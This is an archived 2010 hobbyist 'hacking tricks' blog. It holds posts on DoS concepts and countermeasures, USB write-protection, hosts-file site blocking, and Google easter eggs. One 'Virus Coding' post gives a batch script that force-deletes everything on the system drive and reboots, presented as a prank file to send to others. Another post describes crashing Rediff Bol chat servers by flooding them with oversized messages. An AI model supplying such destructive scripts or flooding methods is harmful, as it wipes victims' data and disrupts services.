Wednesday, March 31, 2010

Rediff Bol Chatting Tricks

HOW TO HANG REDIFF BOL ROOM & ITS CHAT ROOM SERVER...
By-Rahul Jaiswal •»яנ«•

Now days we offenly find in rediff bol that rooms list are not opening for long period of times and some times while chatting in the rooms the rediff gets hanged and no message are send in the room.
It all because of some small trick by which rediff gets hanged.
Actually the server gets hanged because of that trick.
And until the server again restarts every thing are hanged in the room and the room list is not opened.

Now i will tell you for what reason the rediff server gets hanged..
As we all know that in rediff bol rediff provide only 500 character chat message which can be send in the room.
So the trick is if you are able to send(any how) more than 500 character chat message to ther server or in the room and continously spam with more than 500 character message in the room.So because of overload and heavy traffic rediff shut its server for some second or minutes(depending on the spam and message character).
So this is how the rediff bol server gets hanged.
I cannot openly say everything about it due to some security reason and ever i cannot say the method and the way of doing it because of the same reason.
For more detail you can email or message me.

Next time i will tell you what all you can do by hanging rediff bol server and i will try to disclose this trick to everyone.

Tuesday, March 16, 2010

Network hacking



Denial of Service Attack

                          By Abir Atarthy
  
Denial of Service

A DoS attack is an attempt by a hacker to flood a user’s or an organization’s system.
During a Denial of Service (DoS) attack, a hacker renders  a system unusable or significantly slows the system by overloading  resources or preventing legitimate users from accessing  the system. These attacks can be perpetrated against an individual system or an entire  network and are usually successful in their attempts.
Session hijacking
is a hacking method that creates a temporary DoS for an end user when
an attacker takes over the session. Session Hijacking is used by hackers to take over a current   session after the user has established an authenticated session. Session hijacking can also be  used to perpetrate a man-in-the-middle attack when the hacker steps between the server and  legitimate client and intercepts all traffic.


Types of DoS Attacks
 
There are two main categories of DoS attacks. DoS attacks can be either sent by a single system  to a single target (simple DoS) or sent by many systems to a single target (DDoS).
The goal of DoS isn’t to gain unauthorized access to machines or data, but to prevent
legitimate users of a service from using it. A DoS attack may do the following:
_
Flood a network with traffic, thereby preventing legitimate network traffic.
_
Disrupt connections between two machines, thereby preventing access to a service.
_
Prevent a particular individual from accessing a service.
_
Disrupt service to a specific system or person.



Different tools use different types of traffic to flood a victim, but the result is the same: A
service on the system or the entire system is unavailable to a user because it’s kept busy trying  to respond to an exorbitant number of requests.
A DoS attack is usually an attack of last resort. It’s considered an unsophisticated attack
because it doesn’t gain the hacker access to any information but rather annoys the target and  interrupts their service. DoS attacks can be destructive and have a substantial impact when  sent from multiple systems at the same time (DDoS attacks).
  
. DDoS attacks can be perpetrated by BOTs and BOTNETS, which are compromised
systems that an attacker uses to launch the attack against the end victim. The system or
network that has been compromised is a secondary victim, whereas the DoS and DDoS
attacks flood the primary victim or target.

 
How DDoS Attacks Works?
 
DDoS is an advanced version of the DoS attack. Like DoS, DDoS also tries to deny access  to services running on a system by sending packets to the destination system in a way that  the destination system can’t handle. The key of a DDoS attack is that it relays attacks from  many different hosts (which must first be compromised), rather then from a single host like  DoS. DDoS is a large-scale, coordinated attack on a victim system.


The services under attack are those of the primary victim; the compromised systems used to  launch the attack are secondary victims. These compromised systems, which send the DDoS  to the primary victim, are sometimes called  zombies  or  BOTs
. They’re usually compromised  through another attack and then used to launch an attack on the primary victim at a certain time
or under certain conditions. It can be difficult to track the source of the attacks because they originate  from several IP addresses.


DoS/DDoS Countermeasures
 
There are several ways to detect, halt, or prevent DoS attacks. The following are common
security features available:

Network-ingress filtering
All network access providers should implement network-ingress
filtering to stop any downstream networks from injecting packets with faked or spoofed
addresses into the Internet. Although this doesn’t stop an attack from occurring, it does make
it much easier to track down the source of the attack and terminate the attack quickly.

Rate-limiting network traffic
A number of routers in the market today have features that  let you limit the amount of bandwidth some types of traffic can consume. This is sometimes
referred to as  traffic shaping
.
Intrusion detection systems
Use an intrusion detection system (IDS) to detect attackers
who are communicating with slave, master, or agent machines. Doing so lets you know
whether a machine in your network is being used to launch a known attack but probably
won’t detect new variations of these attacks or the tools that implement them. Most IDS
vendors have signatures to detect Trinoo, TFN, or Stacheldraht network traffic.

Host-auditing tools
File-scanning tools are available that attempt to detect the existence
of known DDoS tool client and server binaries in a system.

Network-auditing tools
Network-scanning tools are available that attempt to detect the
presence of DDoS agents running on hosts on your network.

General Hacking




 Disable Writing to USB Drives




By Ankita Chaterjee

A common security concern at organizations is allowing users to plug in a usb flash drive, because they could so easily copy corporate data.SinceWindows XP SP2, you can disable writing to USB devices altogether using a simple registry hack.however one should also note that if you are using this trick, you should make sure that the users are not administrators on the computer, because they could easily change this setting back.
Here it is:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001
Paste the code into a notepad file,and then save it as a registry file.Double click it and voila,you have successfully prevented the write access to theUSB drive.
Once you have double clicked the registry, you will have to reboot for the changes to take effect.
This works on Windows Vista as well. Here's the window you'll get when you try and write to a USB drive:






If you want to enable the write access again,then copy this code and paste the code into a notepad file,and then save it as a registry file.Double click it and write access will be enabled again.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000'

Stay tuned for more tips and hacks.
Keep learning


               (With inputs from Abir Atarthy)


Virus Coding

Blue screen of Death

                    By Somnath Singh

Note:-  This is totally intended for educational purpose only. I am no way responsible if you end up  corrupting  your system.  Read the DISCLAIMER section of  this site before you proceed.
 
The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

Type the following code in a notepad and save it as blue.bat. Put it in the start up and see how Windows gets corrupted. if you know the Windows batch programming the logic of the program will be clear to you.


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Monday, March 15, 2010

Why we need ethical hackers?

Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value and completely erase their tracks within 20 minutes. 
While most of the companies are ignorant of their security controls, many succumb to hackers inspite of having the best security systems and policies in place. Breaking sites, defacing them with anti national and porno messages, reading the e-mail secretly, cracking mail passwords,stealing credit card numbers from online shopping site or implant software that will secretly transmit their organization’s secrets to the open Internet have become rampant in the recent past. While the best of security continues to get broken time to time by the determined hackers, what options can a helpless organizations look forward to?
Even in cyber cafes(where most of us regularly visit) ,when we type our mail id and password, a simple  software can trap it and your details activity can be mailed to an unknown person,without any knowledge of the user.How a normal individual will protect his privacy and cope with these sort of situation?


It is no longer adequate to buy and install a simple software package and let it run. Companies need specialists, IT professionals dedicated to network security and trained to find security holes and fix them before they can be exploited.

Globally, with a tremendous rise in cyber crime, there is a rapidly growing demand for highly skilled professional called  ethical hackers who can safeguard the Internet and  corporate networks and their web sites.
The job of ethical hackers is to get into the minds of the computer criminals, think like them and come up with innovative methods to protect computer systems and corporate networks.

Though we have thousands of security consultants from various companies, very few of them are actually aware of measures to counter hacker threats. So,India needs  institutions which would train companies or students in the art of defending their own cyberspace.
Keeping the above things in mind, we have started   course on Ethical Hacking, called “IT Security and Antihacking” which is the first of its kind in WestBengal.aimed at information security professionals, auditors, CTOs, CIOs, network administrators, students.
demand for ethical hackers from sectors like banking, finance, telecom and companies with large network and huge on-line database.


The course curriculum is designed to teach, providing a structured methodology for detailing the techniques used by hackers to assess and attack corporate networks. Beginning with a ethical part of whole things, covering legal and HR issues, reasons why one must perform ethical hack, common attack types and vulnerabilities etc,
Anybody with a basic understanding of computers and network can join in the program. Even normal café users can also do the course to protect his/her privacy at café,office etc.
For course details contact us.

Tuesday, March 2, 2010

Connect us in orkut.com

Connect to Abir in orkut:



Connect to 
RAHUL JAISWAL ▬╡•»яנ«•╞▬ 
on orkut:-




Internet Tricks

Restrict Accessing Orkut.com on your Computer

By-Rahul Jaiswal •»яנ«•

There are few office staffs who spend their days on Orkut and demand salary at the end of the month. Parents are seen to be much worried as their children surf Orkut even during their exam days. At this point of time, you would like to block Orkut.com on your computer, so that no one will be able to open and access Orkut until and unless you want them to do so. Let’s know how to do this.




Navigate to Start >> Run on your computer.


Enter the following line in the Run field and hit Enter. notepad c:\WINDOWS\system32\drivers\etc\hosts


A notepad will pop up with some information in it. Add the following lines to the last line of that notepad. (Hit Enter and add the following code) 127.0.0.1 orkut.com

Save the changes in that notepad file and you are Done.


That’s it. Now no one will be able to access Orkut.com from that computer. In this way you can block other sites also. Simply replace Orkut.com with any site’s name and that site will be blocked from your computer.

If you want to unblock Orkut.com and give access to surf Orkut again, follow the above steps and remove the lines you added there.

Google Tricks continues...

GOOGLE HIDDEN PAGES
By-Rahul Jaiswal •»яנ«•

Some of you probably know about these already (but its for those who are new to it) but the majority of us didn’t…
 
I know that we are mostly giving tricks on google but i just wanted to say that i should complete one thing at a time so that there must not be any confussion ...
 
Here are some hidden google pages...
 
  • 1)Type-google l33t and click i m feeling lucky
  •  
  • 2)Type-elgoog and click i m feeling lucky.. 
  •  
  • 3)Type-loco and click i m feeling lucky..
  •  
  • 4)Type-google gothic and click i m feeling lucky..
  •  
  • 5)Type-google bsd and click i m feeling lucky..
  • 6)Type-google linux and click i m feeling lucky..
  •  
  • 7)Type-google easter egg and click i m feeling lucky..

Window Hacking

Some Small Tricks Just To Fool Around....
By-Rahul Jaiswal •»яנ«•
 
Some of you probably know about these already (that’s because you’re cooler than me) but the majority of us didn’t… until now

 
Have u ever tried to make a folder with any name...just give a try before reading down...

Some of you are not abe to do?? NO problem today i will be telling you how to make a folder without any name
Do you think that you can create a folder without any name..??? if on think again...

Because here is a simple trick to create a folder without any name...

For this trick just go to the folder which you want to create without any name and just right click on it and select rename option from the list and just press alt and type from the num pad 0160 and leave it and see u have created a new folder without any name..

Google Tricks

How to change Google Logo & Background image?


By-Rahul Jaiswal *»яנ«*


All of us are familar with Google and we all use Google as the Search Engine. we can Easily Change Google Logo any name we like, we can also change Background image of google Page.

So Here is the Trick On How to change Boring Google Logo and Background Image:-

I) For Changing Google Logo

1) Using www.pimpmysearch.com/

Go to www.Pimpmysearch.com and Enter the name in the Text Box, which will replace google Logo. Now Click on Create New Button. Now you will see your Logo appearing instead of Google. Bookmark it and make it as your default home page. Now every time you open your browser, your own Search Engine will open.

2) Using GreaseMonkey firefox add-on, this trick works only for FireFox users.
a) Install the GreaseMonkey firefox add-on.


b) Now install the necessary script.


c) After Installing, open www.Google.com


d) Now Double click the Google Logo and a box will appear with two text Boxes, for title and color.


e) Now, you can type your own text and assign any color for each word.


f) Different Numbers represent different color: 1 - blue, 2 - red, 3 - yellow,


4 - green or other - random.


g) Now Click on the "Change" Button.


h) Now you will see new Google Logo.






3) Using www.Buzzisearch.com






If you want a fancier text with Glitters, than go to www.Buzzisearch.com and Enter Your Name and Select the Style you want.


Here is your own search engine with your own name. Now Bookmark it or make it as your default home page.

II) How to Change Google Background Image:-

Go to www.mcsearcher.com and than Enter the name and upload the picture. Than Click on Create Here, Now you will see your own picture as Background. Bookmark it and make it as your Home Page. Now Every time you open your Browser the same picture will appear.